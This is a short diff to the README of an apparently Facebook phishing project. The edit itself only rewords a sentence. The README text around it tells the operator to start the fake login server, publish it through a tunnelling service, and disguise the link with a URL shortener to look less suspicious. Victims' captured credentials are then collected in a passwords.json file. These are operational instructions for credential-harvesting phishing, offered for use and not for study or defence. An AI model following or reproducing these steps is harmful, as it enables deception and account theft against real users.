swettyo/fb-phishing/README.md

 npm start
 ```

-After that, you can use any http tunneling service (e.g. `ngrock`) to get a public url; And you can also use any url shortener to make it more unsuspicious.
+After that, you can use any http tunneling service (e.g. `ngrock`) to get a public url; And you can also use any url shortener to make it less suspicious.

 You will get captured credentials on `passwords.json` file which would be auto-generated.